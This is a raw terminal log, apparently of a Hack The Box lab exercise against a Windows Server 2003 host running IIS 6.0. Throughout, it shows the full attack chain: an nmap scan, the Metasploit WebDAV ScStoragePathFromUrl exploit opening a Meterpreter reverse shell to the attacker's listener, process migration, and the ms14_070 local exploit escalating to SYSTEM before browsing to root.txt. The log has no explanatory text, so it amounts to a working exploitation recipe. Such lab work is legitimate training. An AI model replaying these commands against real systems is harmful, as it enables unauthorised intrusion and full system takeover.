$ nmap -sC -sV -A -oA granny 10.10.10.15 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 03:19 PDT 

# Nmap 7.91 scan initiated Sat May 8 01:11:23 2021 as: nmap -sC -sV -A -oA granny 10.10.10.15 Nmap scan report for 10.10.10.15 Host is up (0.19s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT |_http-server-header: Microsoft-IIS/6.0 |_http-title: Error | http-webdav-scan: | Server Type: Microsoft-IIS/6.0 | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK | WebDAV type: Unknown |_ Server Date: Sat, 08 May 2021 08:13:22 GMT Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat May 8 01:11:48 2021 -- 1 IP address (1 host up) scanned in 25.44 seconds 

$ msfconsole +-------------------------------------------------------+ | METASPLOIT by Rapid7 | +---------------------------+---------------------------+ | __________________ | | | ==c(______(o(______(_() | |""""""""""""|======[*** | | )=\ | | EXPLOIT \ | | // \\ | |_____________\_______ | | // \\ | |==[msf >]============\ | | // \\ | |______________________\ | | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ | | // \\ | ********************* | +---------------------------+---------------------------+ | o O o | \'\/\/\/'/ | | o O | )======( | | o | .' LOOT '. | | |^^^^^^^^^^^^^^|l___ | / _||__ \ | | | PAYLOAD |""\___, | / (_||_ \ | | |________________|__|)__| | | __||_) | | | |(@)(@)"""**|(@)(@)**|(@) | " || " | | = = = = = = = = = = = = | '--------------' | +---------------------------+---------------------------+ =[ metasploit v6.0.40-dev ] + -- --=[ 2119 exploits - 1138 auxiliary - 360 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 8 evasion ] Metasploit tip: Adapter names can be used for IP params set LHOST eth0 msf6 > search iis 6.0 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow 1 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service 2 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl 

msf6 > use 2 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl): Name Current Setting Required Description ---- --------------- -------- ----------- MAXPATHLENGTH 60 yes End of physical path brute force MINPATHLENGTH 3 yes Start of physical path brute force Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syn tax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path of IIS 6 web application VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.20.10.2 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Microsoft Windows Server 2003 R2 SP2 x86 msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.15 rhost => 10.10.10.15 msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.5 lhost => 10.10.14.5 msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check [+] 10.10.10.15:80 - The target is vulnerable. msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run [*] Started reverse TCP handler on 10.10.14.5:4444 [*] Trying path length 3 to 60 ... [*] Sending stage (175174 bytes) to 10.10.10.15 [*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.15:1030) at 2021-05-10 03:24:21 -0700 meterpreter > 

meterpreter > getuid [-] stdapi_sys_config_getuid: Operation failed: Access is denied. 

meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 272 4 smss.exe 324 272 csrss.exe 348 272 winlogon.exe 396 348 services.exe 408 348 lsass.exe 596 396 svchost.exe 680 396 svchost.exe 736 396 svchost.exe 784 396 svchost.exe 800 396 svchost.exe 936 396 spoolsv.exe 964 396 msdtc.exe 1084 396 cisvc.exe 1124 396 svchost.exe 1180 396 inetinfo.exe 1216 396 svchost.exe 1332 396 VGAuthService.exe 1412 396 vmtoolsd.exe 1464 396 svchost.exe 1628 396 svchost.exe 1732 396 dllhost.exe 1816 396 alg.exe 1832 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse .exe 1900 396 dllhost.exe 2120 396 vssvc.exe 2176 1464 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp. exe 2244 596 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcd ata.exe 2308 2176 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe 2488 596 wmiprvse.exe 

meterpreter > getpid Current pid: 2308 

meterpreter > getpid Current pid: 2308 

meterpreter > migrate 2244 [*] Migrating from 2308 to 2244... [*] Migration completed successfully. 

meterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE 

meterpreter > background [*] Backgrounding session 1... msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf6 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.15 - Collecting local exploits for x86/windows... [*] 10.10.10.15 - 37 exploit checks are being tried... [+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options Module options (exploit/windows/local/ms14_058_track_popup_menu): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.20.10.2 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows x86 msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1 session => 1 msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.5 lhost => 10.10.14.5 msf6 exploit(windows/local/ms14_058_track_popup_menu) > run [*] Started reverse TCP handler on 10.10.14.5:4444 [*] Launching notepad to host the exploit... [+] Process 1824 launched. [*] Reflectively injecting the exploit DLL into 1824... [*] Injecting exploit into 1824... [*] Exploit injected. Injecting payload into 1824... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Exploit completed, but no session was created. 

msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms14_070_tcpip_ioctl [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options Module options (exploit/windows/local/ms14_070_tcpip_ioctl): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.20.10.2 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows Server 2003 SP2 msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1 session => 1 msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5 lhost => 10.10.14.5 msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run [*] Started reverse TCP handler on 10.10.14.5:4444 [*] Storing the shellcode in memory... [*] Triggering the vulnerability... [*] Checking privileges after exploitation... [+] Exploitation successful! [*] Sending stage (175174 bytes) to 10.10.10.15 [*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.15:1031) at 2021-05-10 03:32:40 -0700 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 

meterpreter > cd / meterpreter > ls Listing: C:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2017-04-12 07:27:12 -0700 ADFS 100777/rwxrwxrwx 0 fil 2017-04-12 07:04:44 -0700 AUTOEXEC.BAT 100666/rw-rw-rw- 0 fil 2017-04-12 07:04:44 -0700 CONFIG.SYS 40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 Documents and Settings 40777/rwxrwxrwx 0 dir 2017-04-12 07:17:24 -0700 FPSE_search 100444/r--r--r-- 0 fil 2017-04-12 07:04:44 -0700 IO.SYS 40777/rwxrwxrwx 0 dir 2017-04-12 07:16:33 -0700 Inetpub 100444/r--r--r-- 0 fil 2017-04-12 07:04:44 -0700 MSDOS.SYS 100555/r-xr-xr-x 47772 fil 2007-02-18 04:00:00 -0800 NTDETECT.COM 40555/r-xr-xr-x 0 dir 2017-04-12 06:43:02 -0700 Program Files 40777/rwxrwxrwx 0 dir 2017-04-12 12:02:02 -0700 RECYCLER 40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 System Volume Information 40777/rwxrwxrwx 0 dir 2017-04-12 06:41:07 -0700 WINDOWS 100666/rw-rw-rw- 208 fil 2017-04-12 06:42:08 -0700 boot.ini 100444/r--r--r-- 297072 fil 2007-02-18 04:00:00 -0800 ntldr 0000/--------- 0 fif 1969-12-31 16:00:00 -0800 pagefile.sys 40777/rwxrwxrwx 0 dir 2017-04-12 07:05:06 -0700 wmpub meterpreter > cd Documents\ and\ Settings meterpreter > ls Listing: C:\Documents and Settings ================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Administrator 40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 All Users 40777/rwxrwxrwx 0 dir 2017-04-12 06:42:38 -0700 Default User 40777/rwxrwxrwx 0 dir 2017-04-12 12:19:46 -0700 Lakis 40777/rwxrwxrwx 0 dir 2017-04-12 07:08:32 -0700 LocalService 40777/rwxrwxrwx 0 dir 2017-04-12 07:08:31 -0700 NetworkService meterpreter > cd Administrator meterpreter > ls Listing: C:\Documents and Settings\Administrator ================================================ Mode Size Type Last modified Name --------- ---- ---- ------------- ---- 40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Application Data 40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Cookies 40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Desktop 40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Favorites 40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Local Settings 40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 My Documents 100666/rw-rw-rw- 786432 fil 2017-04-12 07:12:15 -0700 NTUSER.DAT 40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 NetHood 40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 PrintHood 40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Recent 40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 SendTo 40555/r-xr-xr-x 0 dir 2017-04-12 07:12:15 -0700 Start Menu 100666/rw-rw-rw- 0 fil 2017-04-12 07:12:15 -0700 Sti_Trace.log 40777/rwxrwxrwx 0 dir 2017-04-12 07:12:15 -0700 Templates 40777/rwxrwxrwx 0 dir 2017-04-12 11:48:10 -0700 UserData 100666/rw-rw-rw- 1024 fil 2017-04-12 07:12:15 -0700 ntuser.dat.LOG 100666/rw-rw-rw- 178 fil 2017-04-12 07:12:15 -0700 ntuser.ini meterpreter > cd Desktop lmeterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name --------- ---- ---- ------------- ---- 100444/r--r--r-- 32 fil 2017-04-12 07:28:50 -0700 root.txt 

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5 lhost => 10.10.14.5 msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1 session => 1 msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run [*] Started reverse TCP handler on 10.10.14.5:4444 [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied. [*] Exploit completed, but no session was created.